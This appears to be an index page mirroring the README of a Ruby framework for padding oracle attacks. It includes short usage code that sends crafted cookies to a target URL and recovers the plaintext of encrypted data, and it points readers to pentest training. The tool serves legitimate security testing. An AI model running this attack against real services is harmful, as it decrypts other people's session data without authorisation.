Ecosyste.ms: Awesome

An open API service indexing awesome lists of open source software.

Awesome Lists | Featured Topics | Projects

https://github.com/technion/paddingoracle

Ruby framework for exploiting padding oracle vulnerabilities
https://github.com/technion/paddingoracle

Last synced: about 2 months ago
JSON representation

Ruby framework for exploiting padding oracle vulnerabilities

Awesome Lists containing this project

README 

        
# Paddingoracle



This is a Rubyframework for exploiting padding oracle vulnerabilities based on this fantastic Python project:



https://github.com/mwielgoszewski/python-paddingoracle



## Build status

[![Build Status](https://travis-ci.org/technion/paddingoracle.svg?branch=master)](https://travis-ci.org/technion/paddingoracle)



## Usage



You will first need to extend the module with your own padding_oracle function. Example:



```

require 'httparty'

require 'base64'

require 'uri'



URL = 'http://google.com'

module Paddingoracle

  def decrypt_oracle(string)

    string = URI.escape(Base64.strict_encode64(string))

    response = HTTParty.get(URL, cookies: {auth: string})



    raise "Invalid padding" if response.code != 200

  end

end

```



You can then run the attack like this;

```

Blocksize = 8

COOKIE = 'vulnerable encrypted data'

bcookie = Base64.decode64(COOKIE)

plain = Paddingoracle::recover_all_blocks(bcookie, Blocksize)

puts plain

```



## Contributing



This product was written to solve a specific problem - I'm happy to investigate bugs but this type of codebase is not suited to new features or "how to use" requests.



If you are interested in this tool, we highly recommend the training at [PentesterLab](pentesterlab.com), which includes a vulnerable service relevant to this tool.



## License



The gem is available as open source under the terms of the [MIT License](http://opensource.org/licenses/MIT).